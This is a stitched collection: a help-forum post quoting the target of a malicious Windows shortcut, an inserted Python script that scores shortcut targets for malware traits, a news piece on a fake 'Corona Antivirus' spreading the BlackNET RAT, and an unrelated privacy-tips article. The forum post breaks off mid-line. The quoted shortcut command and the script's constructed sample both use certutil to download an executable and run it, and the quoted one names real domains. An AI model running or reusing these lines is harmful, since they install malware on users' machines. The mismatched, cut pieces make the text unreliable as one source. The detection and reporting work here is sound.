.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder... I ran scans with Malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…
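A triage heuristic for shortcut targets shaped like the one quoted in the post above, as an added example that is not part of the original post. The indicator names, the verdict thresholds and both sample targets are constructed for illustration.

```python
import re

# Heuristic indicators for a shortcut (.lnk) target string. The patterns and
# names are this example's own choices, modelled on the traits visible in the
# quoted command: cmd with delayed expansion, chained SETs, certutil download.
INDICATORS = {
    "cmd_interpreter": re.compile(r"%comspec%|\bcmd(\.exe)?\b", re.I),
    "delayed_expansion": re.compile(r"/v(:on)?\b", re.I),
    "bang_variables": re.compile(r"![A-Za-z0-9_]+!"),
    "set_chain": re.compile(r"\bset\s+\w+=.*&\s*set\s+\w+=", re.I),
    "certutil_download": re.compile(r"certutil(\.exe)?\s+.*-urlcache\b", re.I),
    "output_suppressed": re.compile(r">\s*nul\s+2>&1", re.I),
    "exe_named_from_env": re.compile(r"%\w+%\.exe", re.I),
}


def triage(target):
    """Return (verdict, matched indicator names) for one shortcut target."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(target)]
    # Assumed thresholds: a certutil cache download from a shortcut, or three
    # or more co-occurring traits, is escalated; a single trait is only noted.
    if "certutil_download" in hits or len(hits) >= 3:
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "no_indicators"
    return verdict, hits


# Constructed sample targets (not taken from any real shortcut).
SAMPLE_OBFUSCATED = (
    r'%ComSpec% /v:on/c(SET A=/x_%PROCESSOR_ARCHITECTURE% !B!&'
    r'SET B="%USERNAME%.exe"&SET C=certutil -urlcache -f https://&'
    r'IF NOT EXIST !B! (!C!host.example!A!&!B!))>nul 2>&1'
)
SAMPLE_BENIGN = r'"C:\Program Files\Mozilla Firefox\firefox.exe" -private-window'

if __name__ == "__main__":
    for sample in (SAMPLE_OBFUSCATED, SAMPLE_BENIGN):
        verdict, hits = triage(sample)
        print(f"{verdict:14} {hits}")
```
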

Fake Corona Antivirus Software Used to Install Backdoor Malware - BleepingComputer

Posted: 23 Mar 2020 04:12 PM PDT

Fake Corona Antivirus Software Used to Install Backdoor Malware

Sites promoting a bogus Corona Antivirus are taking advantage of the current COVID-19 pandemic to promote and distribute a malicious payload that will infect the target's computer with the BlackNET RAT and add it to a botnet.

The two sites promoting the fake antivirus software can be found at antivirus-covid19[.]site and corona-antivirus[.]com as discovered by the Malwarebytes Threat Intelligence team and researchers at MalwareHunterTeam, respectively.

While the former was already taken down since Malwarebytes' report, the one spotted by MalwareHunterTeam is still active but it had its contents altered, with the malicious links removed and a donation link added to support the scammers' efforts — spoiler alert, no donations were made until now.

The malicious site

"Download our AI Corona Antivirus for the best possible protection against the Corona COVID-19 virus," the site reads. "Our scientists from Harvard University have been working on a special AI development to combat the virus using a mobile phone app."

Last but not least, the malicious sites' makers also mention an update that will add VR sync capabilities to their fake antivirus: "We analyse the corona virus in our laboratory to keep the app always up to date! Soon a corona antivirus VR synchronization will be implemented!"

If anyone were to fall for this, they would end up downloading an installer from antivirus-covid19[.]site/update.exe (link is now down) that will deploy the BlackNET malware onto their systems if launched.

BlackNET will add the infected device to a botnet that can be controlled by its operators:

• to launch DDoS attacks
• to upload files onto the compromised machine
• to execute scripts
• to take screenshots
• to harvest keystrokes using a built-in keylogger (LimeLogger)
• to steal bitcoin wallets
• to harvest browser cookies and passwords.

The BlackNET RAT, which was rated as 'skidware malware' by MalwareHunterTeam, is also capable of detecting whether it's being analyzed within a VM, and it checks for the presence of analysis tools commonly used by malware researchers, per c0d3inj3cT's analysis.

BlackNET command panel

The malware also comes with bot management features including restarting and shutting down the infected devices, uninstalling or updating the bot client, and opening visible or hidden web pages.

One of the sites promoting this bogus Corona Antivirus was spotted by MalwareHunterTeam on March 6, while the other was exposed by Malwarebytes' Threat Intelligence team in a report published today.

In somewhat related news, an HHS.gov open redirect is currently abused by attackers to deliver Raccoon info-stealing malware payloads onto targets' systems via a coronavirus-themed phishing campaign.

The actors behind these ongoing phishing attacks use the open redirect to link to a malicious attachment that delivers a VBS script previously spotted while being employed by the operators behind Netwalker Ransomware to deploy their payloads.

The World Health Organization (WHO), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Federal Trade Commission (FTC) have all warned about Coronavirus-themed phishing and attacks targeting potential victims from countries around the globe (1, 2, 3).

5 ways to protect your privacy online - AZ Big Media

Posted: 23 Mar 2020 10:31 AM PDT

With each passing year, more and more services are going online. You're required to disclose a ton of personal details and information over the internet, leaving you vulnerable to a privacy breach. Your computer likely contains banking information, personal tax details, contact information, and many important documents. This data is necessary, and it's unavoidable that you'll need to divulge it online at some point.

That said, you must know how to protect your information correctly to avoid any breaches of your sensitive data. If you are a victim of fraud or your data is hacked, you could face financial implications, negative impacts on your credit rating, and lots of stress.

Here are five simple ways to ensure that your private information stays private online.

1. Use an Antivirus

The most important way you can protect your privacy is by using quality antivirus software. Antivirus software will stop harmful viruses and spyware from accessing your computer in the first place. There are new types of viruses popping up each day, and they can delete your files, access your personal data, and even use your computer to attack another. Ransomware is becoming increasingly common, and it's a doozy. It encrypts all your data, preventing you from accessing it. You will need to pay a fee to the criminals for them to decrypt it, and there's no guarantee they even will. Antivirus software will give you up-to-date protection from all known virus strains.

2. Strengthen your passwords

While it can be tempting to use the same password for everything, it's definitely not advised. If a hacker or cybercriminal decodes even one of your passwords, they will then have access to everything. Make sure you use passwords that are not easy to guess; avoid birthdays, your partner's name, or the school you went to. Ensure passwords contain a good mix of letters, both lowercase and uppercase, numbers, and symbols if they allow it. It's also a good idea to get in the habit of updating your passwords regularly to make sure you're protected. Another good option is using a password manager, which generates random passwords for you and stores them safely.

3. Delete cookies

Browser cookies – not the edible kind – are text files that are stored in your browser, and they provide information about your activity to each website. While this is not always a bad thing and is generally used to enhance your user experience, it can sometimes be a virus in disguise. Usually, a website will ask you to approve its use of cookies when you first arrive. This means the site will track your data, such as what products you look at on a web-store, or your login details. This data is then used to customize your experience and provide insight into customer habits for marketing purposes.

Viruses and malware can sometimes disguise themselves as cookies, so you should be careful what you accept. Most browsers allow you to block cookies, but make sure you go into your settings and delete cookies regularly because they have a way of sneaking in. They have also evolved, with zombie cookies reappearing even after being removed. By blocking cookies and regularly deleting them, you can prevent viruses from getting into your computer this way.

4. Set your social media profiles to private

Almost everyone uses social media in some form. Whether your preferred platform is Facebook, Instagram, or Snapchat, make sure you set your profiles to private. That way, you have control over who has access to your information. You may not think that anyone would bother digging up your details, but when you have a public profile, you put yourself at risk. Everything you've ever posted and been tagged in is accessible, including embarrassing photos, job history, contact details, addresses, and more. You also leave yourself open to identity theft and even stalking.

5. Always log out of accounts

Even if you're browsing on your home network or cellphone, always log out of your accounts when you finish. Leaving your accounts logged in will make you an easy target for cybercriminals trying to access your information. It goes without saying that signing out of your online banking is extremely important, but hackers have other ways of getting your details. If you log into an online shopping platform, such as Amazon, or even Uber/Uber Eats, you likely have a payment method linked to your account. That means there is the potential to access your account and your finances.

Final Thoughts

People are spending so much more time online and using the internet for almost everything. From dealing with your finances to doing your shopping, your personal data is all over the internet. Your privacy is important, and you need to take all the necessary steps to ensure you're protected against a data breach. Using these strategies, you can be aware of potential risks and work to prevent your information from falling into the wrong hands. 
